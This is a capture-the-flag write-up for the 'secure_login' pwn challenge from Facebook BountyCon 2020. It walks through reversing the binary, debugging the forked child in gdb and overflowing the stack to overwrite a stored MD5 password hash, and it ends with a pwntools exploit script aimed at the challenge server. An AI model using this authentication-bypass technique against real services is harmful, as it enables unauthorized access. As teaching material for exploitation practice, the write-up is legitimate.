Secure login facebook bountycon 2020
this is the only one pwn challenge on facebook bountycon 2020 , here is how i solve it.
the description :
We developed a super secure login system, but unfortunately we aren't
familiar with those newfangled memory-safe languages.
and we are given 64-bit ELF binary
./secure_login: ELF 64-bit LSB shared object,
x86-64, version 1 (SYSV), dynamically linked,
interpreter /lib64/l, BuildID[sha1]=e04815d2376518cc8b4295463f91479b57b8212a,
for GNU/Linux 3.2.0, not stripped
after open it on ida , i found some function
- 0x0000000000001269 wait_for_zombie
- 0x0000000000001291 check_passwd
- 0x0000000000001414 take_connections_forever
- 0x00000000000014dc main
let’s see check_passwd()
function
looks like our input will compare with v17 , i assume v17 and v18 is one variable since this is md5
this is take_connections_forever()
function
look like we have to follow child process to debug check_passwd()
, since there’s
fork()
on
if ( !fork() )
{
close(a1);
check_passwd(v2);
}
this is can be done by using command set follow-fork-mode child
on gdb
and set breakpoint on check_passwd
now lets try to run it
the binary will made a connection on port 10000 , so i connect to this port using
nc
command, now lets set another breakpoint on
0x00005555555553af <+286>: call 0x555555555100 <memcmp@plt>
and try to input AAAAAAAA
value on 0x00007fffffffdda0
is md5 from our input and 0x00007fffffffdd90
from the binary it self , lets see rsp
0x7fffffffdd10: 0x4141414141414141 0x000000000000000a <-- our input
0x7fffffffdd20: 0x0000000000000000 0x0000000000000000
0x7fffffffdd30: 0x0000000000000000 0x0000000000000000
0x7fffffffdd40: 0x0000000000000000 0x0000000000000000
0x7fffffffdd50: 0x0000000000000000 0x0000000000000000
0x7fffffffdd60: 0x0000000000000000 0x0000000000000000
0x7fffffffdd70: 0x0000000000000000 0x0000000000000000
0x7fffffffdd80: 0x0000000000000000 0x0000000000000000
0x7fffffffdd90: 0xa99dd1dbed586201 0xc6bbb0b969f29e4d <-- the md5 password
0x7fffffffdda0: 0xf5f48e17c7c26f5c 0x71750fc6d47e8ca8 <-- this is md5 from our input
let’s input A*152
look like we can control rsi
and rcx
, let’s see the stack
now we can try to overwrite 0x7fffffffdd90
so the value will have same value
with our input , this is my exploit to solve this challenge
from pwn import *
def main():
# r = remote("127.0.0.1",10000)
r = remote("ec2-3-11-37-224.eu-west-2.compute.amazonaws.com",10000)
# reached
p = "A" * (152 - 32)
p += "A" * 8
p += p64(0x2016e548d3b035af)
p += p64(0x0c5b389d3383e136)
r.sendlineafter(":",p)
r.interactive()
if __name__ == '__main__':
main()